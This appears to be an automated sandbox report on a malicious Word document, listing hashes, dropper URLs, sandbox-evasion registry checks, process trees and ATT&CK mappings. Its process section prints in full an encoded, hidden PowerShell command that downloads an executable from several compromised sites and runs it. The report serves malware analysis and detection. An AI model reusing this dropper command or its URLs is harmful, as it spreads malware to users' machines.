efd4cc52e1dc0f9bb0216e0beb8a8e82edb73d997075f37443cb7f89aea588be

General

Target

efd4cc52e1dc0f9bb0216e0beb8a8e82edb73d997075f37443cb7f89aea588be.doc
Size

200KB
MD5

4312f79ae438c0296d162c7c01a28e64
SHA1

e3c87785d35bdc6f743724ab45a9804cb5d718fc
SHA256

efd4cc52e1dc0f9bb0216e0beb8a8e82edb73d997075f37443cb7f89aea588be
SHA512

7e97b76532b993d6507511afde87a7d362593bb13ad8318df9088e1386289a437db3b0304e6d30e83d8c63b27b26eb6a1574fd8a14492507816718bea6c8ab91
SSDEEP

3072:G7y2y/GdyDktGDWLS0HZWD5w8K7Nk9KD7IBU9xjCamqFxvhssVAk:ky2k4TtGiL3HJk9KD7b9RCamqFx9/

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://music4one.org/uploads/bVHdQlydbS/

exe.dropper

http://morrell-stinson.com/wp-admin/m0r8m5h/

exe.dropper

http://vinthermoeller.dk/edge_includes/fFEEM/

exe.dropper

http://wallis.cz/pension/Xl5a/

exe.dropper

http://dmyourbusiness.com/print_orders/JUDxA8/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	372	2268	Powershell.exe	83

Blocklisted process makes network request 5 IoCs

flow	pid	Process
27	372	Powershell.exe
31	372	Powershell.exe
32	372	Powershell.exe
36	372	Powershell.exe
38	372	Powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
372	Powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
1480	WINWORD.EXE
1480	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
372	Powershell.exe
372	Powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	372	Powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
1480	WINWORD.EXE
1480	WINWORD.EXE

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
1480	WINWORD.EXE
1480	WINWORD.EXE
1480	WINWORD.EXE
1480	WINWORD.EXE
1480	WINWORD.EXE
1480	WINWORD.EXE
1480	WINWORD.EXE

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 1480 wrote to memory of 3732	1480	WINWORD.EXE	85
PID 1480 wrote to memory of 3732	1480	WINWORD.EXE	85

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\efd4cc52e1dc0f9bb0216e0beb8a8e82edb73d997075f37443cb7f89aea588be.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1480
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:3732

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
Powershell -w hidden -en JABFAGsAaQB4AGgAawBsAG8AcwA9ACcASAB4AGgAbwBpAHIAegBmAGkAaABiAGcAagAnADsAJABEAGsAYgB6AHcAbABkAHMAIAA9ACAAJwAxADMANAAnADsAJABNAGUAawBzAHYAdwB3AHkAegBhAD0AJwBHAGQAcAB1AHUAZwB3AG4AdABrACcAOwAkAEoAaQBxAHIAcQBwAGUAbgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQARABrAGIAegB3AGwAZABzACsAJwAuAGUAeABlACcAOwAkAEUAbQBmAHgAYwBkAHkAdABlAGIAegBrAD0AJwBDAGsAYgBqAHAAaAB4AHAAJwA7ACQATgB0AHQAbgBrAHIAcwBnAHYAZAB1AHUAeAA9ACYAKAAnAG4AZQB3AC0AJwArACcAbwBiACcAKwAnAGoAZQBjACcAKwAnAHQAJwApACAATgBlAHQALgBXAEUAYgBDAEwAaQBFAE4AdAA7ACQAUQBrAHEAegBrAHkAcQBpAHEAdgB4AD0AJwBoAHQAdABwADoALwAvAG0AdQBzAGkAYwA0AG8AbgBlAC4AbwByAGcALwB1AHAAbABvAGEAZABzAC8AYgBWAEgAZABRAGwAeQBkAGIAUwAvACoAaAB0AHQAcAA6AC8ALwBtAG8AcgByAGUAbABsAC0AcwB0AGkAbgBzAG8AbgAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AbQAwAHIAOABtADUAaAAvACoAaAB0AHQAcAA6AC8ALwB2AGkAbgB0AGgAZQByAG0AbwBlAGwAbABlAHIALgBkAGsALwBlAGQAZwBlAF8AaQBuAGMAbAB1AGQAZQBzAC8AZgBGAEUARQBNAC8AKgBoAHQAdABwADoALwAvAHcAYQBsAGwAaQBzAC4AYwB6AC8AcABlAG4AcwBpAG8AbgAvAFgAbAA1AGEALwAqAGgAdAB0AHAAOgAvAC8AZABtAHkAbwB1AHIAYgB1AHMAaQBuAGUAcwBzAC4AYwBvAG0ALwBwAHIAaQBuAHQAXwBvAHIAZABlAHIAcwAvAEoAVQBEAHgAQQA4AC8AJwAuACIAUwBQAGAAbABpAHQAIgAoACcAKgAnACkAOwAkAFMAZwBsAGMAaABvAG8AYgBxAD0AJwBJAHIAeQB2AHYAYgB6AGYAZQBkAGUAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFYAbgBnAG4AawBsAGIAdgB2AG4AagAgAGkAbgAgACQAUQBrAHEAegBrAHkAcQBpAHEAdgB4ACkAewB0AHIAeQB7ACQATgB0AHQAbgBrAHIAcwBnAHYAZAB1AHUAeAAuACIAZABvAFcATgBsAE8AQQBgAGQAYABGAEkAbABFACIAKAAkAFYAbgBnAG4AawBsAGIAdgB2AG4AagAsACAAJABKAGkAcQByAHEAcABlAG4AKQA7ACQARQBsAG0AawB2AGgAdwBwAG4AYQBlAHcAPQAnAE0AcQBtAHkAdQByAG4AdAB0AGMAbgB0AGYAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAnACsAJwAtAEkAdABlAG0AJwApACAAJABKAGkAcQByAHEAcABlAG4AKQAuACIAbABgAEUAbgBnAFQASAAiACAALQBnAGUAIAAzADgAMwA5ADEAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwBUAGAAQQBSAFQAIgAoACQASgBpAHEAcgBxAHAAZQBuACkAOwAkAEIAbgB1AHMAeQB2AGMAZABnAGkAdQB6AD0AJwBUAHoAZABnAG0AbwBzAGYAawB1AGYAJwA7AGIAcgBlAGEAawA7ACQASgB4AGIAYgB5AGUAcwB6AHIAYgB6AHgAPQAnAEkAcgBsAHgAbgB5AGQAagBuAHEAegAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABDAHYAZABhAG0AbwBlAHMAZwBmAGgAdwA9ACcAUgBjAHgAZABqAHcAYQBqACcA
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:372

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\593D4264.wmf

Filesize
444B

MD5
147eb3e50b732f639bce06e60def7cef

SHA1
de033ea45b45f11d6644da75ed95cc39e65d856a

SHA256
2dc497c22d2df65058c1f609197eacdf128ceb24e84538191ac8fdc26142d6ed

SHA512
d2132ddf9a8293c521ee43c834173e218794d123c651486f7dab7c9ee56c86115295cc81b8f39fbfbde56ae8b82e8d9fb9a91b4a001f99dc339b5319f8659e8b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TCDE3F1.tmp\sist02.xsl

Filesize
245KB

MD5
f883b260a8d67082ea895c14bf56dd56

SHA1
7954565c1f243d46ad3b1e2f1baf3281451fc14b

SHA256
ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353

SHA512
d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eehlbxqk.six.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

Filesize
2KB

MD5
a5ccfedef154f6af4b0bfb7080d4c627

SHA1
6e4661326cadc9a52c443719e2d016390f470ea2

SHA256
0293c86824656cad19c60d18dd7895056bb96c48536a9af0d89a236006fd46a3

SHA512
ae8d8c30be2e9fa13c6e3356019e2dc47a98a2e44f16647362c84cbe532612d96a6d4cc0c33879b52f8d959c943193fde6aa9272d3d664a7550e9ec876b287bf

Download Submit
memory/372-61-0x0000012B48E10000-0x0000012B48E32000-memory.dmp

Filesize
136KB

Download
memory/1480-7-0x00007FFC9A290000-0x00007FFC9A2A0000-memory.dmp

Filesize
64KB

Download
memory/1480-13-0x00007FFCDA210000-0x00007FFCDA405000-memory.dmp

Filesize
2.0MB

Download
memory/1480-9-0x00007FFCDA210000-0x00007FFCDA405000-memory.dmp

Filesize
2.0MB

Download
memory/1480-8-0x00007FFCDA210000-0x00007FFCDA405000-memory.dmp

Filesize
2.0MB

Download
memory/1480-10-0x00007FFC97B60000-0x00007FFC97B70000-memory.dmp

Filesize
64KB

Download
memory/1480-11-0x00007FFCDA210000-0x00007FFCDA405000-memory.dmp

Filesize
2.0MB

Download
memory/1480-14-0x00007FFCDA210000-0x00007FFCDA405000-memory.dmp

Filesize
2.0MB

Download
memory/1480-16-0x00007FFCDA210000-0x00007FFCDA405000-memory.dmp

Filesize
2.0MB

Download
memory/1480-18-0x00007FFCDA210000-0x00007FFCDA405000-memory.dmp

Filesize
2.0MB

Download
memory/1480-17-0x00007FFCDA210000-0x00007FFCDA405000-memory.dmp

Filesize
2.0MB

Download
memory/1480-15-0x00007FFC97B60000-0x00007FFC97B70000-memory.dmp

Filesize
64KB

Download
memory/1480-1-0x00007FFCDA2AD000-0x00007FFCDA2AE000-memory.dmp

Filesize
4KB

Download
memory/1480-12-0x00007FFCDA210000-0x00007FFCDA405000-memory.dmp

Filesize
2.0MB

Download
memory/1480-4-0x00007FFC9A290000-0x00007FFC9A2A0000-memory.dmp

Filesize
64KB

Download
memory/1480-5-0x00007FFCDA210000-0x00007FFCDA405000-memory.dmp

Filesize
2.0MB

Download
memory/1480-6-0x00007FFCDA210000-0x00007FFCDA405000-memory.dmp

Filesize
2.0MB

Download
memory/1480-2-0x00007FFC9A290000-0x00007FFC9A2A0000-memory.dmp

Filesize
64KB

Download
memory/1480-75-0x00007FFCDA210000-0x00007FFCDA405000-memory.dmp

Filesize
2.0MB

Download
memory/1480-79-0x00007FFCDA210000-0x00007FFCDA405000-memory.dmp

Filesize
2.0MB

Download
memory/1480-78-0x00007FFCDA2AD000-0x00007FFCDA2AE000-memory.dmp

Filesize
4KB

Download
memory/1480-3-0x00007FFC9A290000-0x00007FFC9A2A0000-memory.dmp

Filesize
64KB

Download
memory/1480-88-0x00007FFCDA210000-0x00007FFCDA405000-memory.dmp

Filesize
2.0MB

Download
memory/1480-0-0x00007FFC9A290000-0x00007FFC9A2A0000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads